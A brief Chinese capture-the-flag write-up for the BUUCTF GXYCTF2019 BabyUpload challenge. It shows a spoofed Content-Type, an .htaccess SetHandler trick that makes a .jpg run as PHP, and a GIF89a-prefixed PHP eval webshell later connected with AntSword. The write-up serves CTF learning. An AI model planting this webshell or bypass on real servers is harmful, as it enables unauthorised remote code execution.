BUUCTF | [[GXYCTF2019]BabyUpload
知识点
文件类型绕过👇
Content-Type: image/jpeg
apache环境下上传.hatcess
首先上传一个.htaccess内容如下的文件
<FilesMatch "shell2.jpg"> SetHandler application/x-httpd-php </FilesMatch>
这样所有文件都会解析为php,然后再上传图片马,就可以解析
这里上传一个php文件试一下发现文件名后缀不能是 ph 开头,文件内容过滤<?
修改代码然后上传内容如下👇
GIF89a? <script language="php">eval($_POST['lx']);</script>
解题
bp抓包上传.htaccess文件修改Content-Type为image/ipeg点击Forward上传成功
然后在上传shell2.jpg文件Forwark得到地址
最后测试完用蚁剑连接得到flag
这里说一下如果蚁剑添加数据错误的解决思路👇
1、检查前后端的文件上传是否有文件名限制
2、如果文件名有限制则通过burpsuite抓包修改文件名上传
3、上传成功后在用蚁剑或者菜刀进行webshell连接。
错误出在了哪里呢,经过求教群友和反思,错误应该在上传的文件中的php代码语法出错去网上搜索一份正确的代码即可!